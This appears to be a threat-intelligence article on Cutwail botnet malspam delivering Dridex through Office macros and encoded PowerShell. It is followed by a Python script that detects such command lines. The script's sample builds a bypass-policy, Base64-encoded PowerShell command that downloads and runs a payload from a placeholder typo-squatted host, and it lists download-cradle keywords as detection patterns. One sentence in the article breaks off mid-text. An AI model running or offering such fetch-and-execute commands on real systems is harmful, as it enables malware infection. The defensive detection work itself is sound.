Cutwail Botnet-Led Dridex and Malicious PowerShell Related Attacks, Increase with new Scripts


IBM X-Force intelligence has observed an increase in Dridex-related network attacks led by the Cutwail botnet. Dridex arrives by e-mail as a second-stage payload: the original document or spreadsheet carries booby-trapped macros, and recipients who unintentionally trigger them launch malware that installs further malware through a PowerShell script. X-Force is currently seeing relatively smaller campaigns in Italy and Japan.

Malspam e-mails are the initial infection vector for these threats: recipients receive unsolicited messages, mostly sent through the Cutwail botnet, carrying Microsoft Office file attachments. Cutwail was a popular cybercrime spam platform in 2009 and still distributes spam for prominent malware gangs; it has been the biggest of its kind. As of June 2020, at least 34% of all PowerShell attacks seen by X-Force were related to the Dridex payload. The uptick in PowerShell activity was already apparent at the beginning of 2020 and rose significantly in May 2020. In December 2020, X-Force recorded activity peaks representing an 80 percent rise in the total number of malicious PowerShell attacks over the previous six-month period.

In January 2021, both the PowerShell attacks and the Dridex-integrated attacks dropped suddenly, presumably as that campaign ended, and a new campaign was launched using a separate macro as well as other scripts.

In the case X-Force investigated, the PowerShell command is directed to override the local execution policy and run a Base64-encoded command, which instructs the host to navigate to a supposed Microsoft URL. The script then retrieves a malicious file from the typo-squatted domain. These basic steps differ per variant and campaign. The Dridex payload is the exe ..
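The three traits described above (execution-policy override, a Base64-encoded command, and a download from an unexpected host) can be checked directly from process command lines. The following is an added example written for this article, not code from X-Force or the campaign; the command lines and the placeholder host are constructed, and the allowlist of expected hosts is an assumption a defender would tune to their environment.

```python
import base64
import re
from urllib.parse import urlparse

def encode_ps(script: str) -> str:
    """-EncodedCommand takes Base64 of the UTF-16LE script (used only to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_ps(blob: str) -> str:
    """Reverse of encode_ps: recover the script text an analyst wants to read."""
    return base64.b64decode(blob).decode("utf-16-le")

# Download-cradle verbs and URLs inside the decoded script.
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-Expression|\biex\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
# Assumption: hosts a script on this machine is expected to fetch from.
EXPECTED_HOSTS = {"www.microsoft.com", "download.microsoft.com"}

def analyze(cmdline: str) -> dict:
    """Flag policy override, encoded command, cradle and unexpected hosts in one command line."""
    tokens = cmdline.split()
    result = {"policy_override": False, "encoded": False, "script": None,
              "cradle": False, "unexpected_hosts": []}
    for i, tok in enumerate(tokens):
        low = tok.lower()
        nxt = tokens[i + 1].lower() if i + 1 < len(tokens) else ""
        if low in ("-executionpolicy", "-ep", "-exec") and nxt in ("bypass", "unrestricted"):
            result["policy_override"] = True
        if low in ("-encodedcommand", "-enc", "-ec", "-e") and nxt:
            result["encoded"] = True
            try:
                result["script"] = decode_ps(tokens[i + 1])
            except (ValueError, UnicodeDecodeError):
                result["script"] = None  # undecodable blob: keep the encoded flag anyway
    script = result["script"] or cmdline
    result["cradle"] = bool(CRADLE_RE.search(script))
    for url in URL_RE.findall(script):
        host = urlparse(url).hostname or ""
        if host not in EXPECTED_HOSTS:
            result["unexpected_hosts"].append(host)
    result["suspicious"] = result["policy_override"] and result["encoded"] and result["cradle"]
    return result

# Constructed samples: one mimics the described chain, one is a benign scheduled script.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://update.micros0ft-placeholder.example/payload')"
SAMPLE_CMDLINES = [
    "powershell.exe -NoP -ExecutionPolicy Bypass -EncodedCommand " + encode_ps(SAMPLE_SCRIPT),
    "powershell.exe -File C:\\Scripts\\nightly-backup.ps1",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(analyze(line))
```

Feed `analyze` with Sysmon event 1 or Windows 4688 command lines; the decoded script text is what an analyst should review, since the Base64 wrapper alone carries no indicator.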